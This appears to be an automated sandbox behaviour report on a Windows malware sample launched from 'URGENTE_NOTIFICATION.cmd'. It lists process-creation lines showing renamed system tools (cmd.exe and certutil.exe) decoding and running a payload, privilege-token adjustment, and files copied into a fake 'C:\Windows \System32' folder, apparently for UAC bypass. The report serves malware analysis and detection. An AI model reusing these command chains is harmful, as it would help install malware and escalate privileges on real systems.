Code function: 3_2_00007FF683F732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,

3_2_00007FF683F732B0

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,	6_2_00007FF66596826C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152A7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	9_2_152A7952
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14567952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	24_2_14567952

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF683F9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

3_2_00007FF683F9FB54

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_1529F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

9_2_1529F474

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6658C46C0 CoCreateInstance,#357,SysFreeString,

6_2_00007FF6658C46C0

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF665946320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,

6_2_00007FF665946320

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152AAC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,

9_2_152AAC78

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2564:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
Source: C:\Users\Public\Libraries\sppsvc.pif	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-RFUXJL

Source: C:\Users\Public\Libraries\sppsvc.pif

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "

Source: C:\Users\Public\Libraries\sppsvc.pif	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Source: unknown	Process created: C:\Users\Public\Libraries\Mywiztwu.PIF "C:\Users\Public\Libraries\Mywiztwu.PIF"
Source: unknown	Process created: C:\Users\Public\Libraries\Mywiztwu.PIF "C:\Users\Public\Libraries\Mywiztwu.PIF"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\sppsvc.pif C:\Users\Public\Libraries\sppsvc.pif	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO F"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: eamsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: am.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Section loaded: amsi.dll	Jump to behavior
